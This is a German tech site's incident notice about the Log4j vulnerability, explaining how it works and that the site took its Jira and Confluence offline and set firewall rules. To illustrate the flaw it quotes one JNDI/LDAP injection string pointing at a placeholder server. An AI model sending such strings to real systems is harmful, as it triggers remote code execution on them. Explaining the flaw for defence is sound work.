Vorab: TechnikNews ist mit keinerlei Dienst von der Lücke betroffen.
In den Medien und auf vielen weiteren Plattformen ist aktuell von einer Sicherheitslücke in "Log4j" zu lesen. Freitagnachmittag tauchten die ersten Meldungen dazu auf – das deutsche BSI (Bundesamt für Sicherheit in der Informationstechnik) hat für diese Lücke "Alarmstufe Rot" ausgerufen. Es handelt sich hier um ein ernstzunehmendes Problem, welches zahlreiche Apps, Plattformen und Webseiten auf der ganzen Welt betrifft. Selbst große Firmen wie Microsoft und Google waren kurzzeitig angreifbar.
Das Problem entsteht, wenn ein Dienst ein Ereignis im Hintergrund protokolliert. Im Java-Universum kommt dabei häufig die Bibliothek Log4j zum Einsatz. Wenn dieser Logeintrag Dinge die Zeichenfolge " ${jndi:ldap://serveradresse.com/a}" enthält, beginnt das Problem. Log4j nimmt nun vom angegeben Server einfach Java-Code entgegen und führt diesen ohne weiteres Nachfragen aus. Ein Supergau.
Bei dieser Lücke kommen in der TechnikNews-Infrastruktur nur das mit Java laufende Jira und Confluence in Frage. Alle anderen Dienste sind nicht betroffen. Laut den Entwicklern gibt es aber keinerlei Hinweise auf Probleme mit der Sicherheitslücke bei Jira und Confluence. Da wir dennoch auf Nummer sicher gehen möchten, haben wir bereits Freitagabend entsprechende Java-Programme mit Log4j vom Netz genommen und Firewallregeln (auch wenn Regex-Regeln laut Experten nicht wirklich wirksam sind) gesetzt, um dieser Art von Angriffen nicht ausgesetzt zu sein.
Wir beobachten weiterhin, dass zahlreiche Angriffsversuche erfolgen, aber nicht erfolgreich sind. Weitere Updates werden wir hier liefern.